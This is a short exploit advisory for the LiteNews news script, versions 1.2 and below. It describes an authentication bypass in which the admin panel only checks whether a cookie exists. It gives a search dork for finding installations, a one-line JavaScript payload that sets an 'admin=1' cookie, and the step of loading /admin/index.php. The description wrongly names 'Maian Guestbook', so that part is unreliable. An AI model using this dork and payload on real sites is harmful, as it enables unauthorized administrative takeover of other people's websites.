LiteNews versions 1.2 and below suffer from an insecure cookie handling vulnerability that allow for administrative access.
5d064adacad62b95e2fe3e7fe4b0e85b3735529e7fc7db3c12809279b4a23358
#########################################################################
# #
# litenews-01 <= 1.2 Insecure Cookie Handling Vulnerability #
# #
#########################################################################
# #
# AUTHOR : Scary-Boys #
# HOME : http://scary-boys.com #
# Download : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations
# #
#########################################################################
# #
# DorKs : "Powered By litenews" #
# #
#########################################################################
# #
# DESCRIPTION : #
# Maian Guestbook suffers from a insecure cookie #
# the admin panel only checks if the cookie exists. #
# #
#########################################################################
# #
# Vulnerability : #
# #
# javascript:document.cookie = "admin=1; path=/"; #
# #
#########################################################################
# #
# after running the javascript, Go to "/admin/index.php" & Refresh #
# #
#########################################################################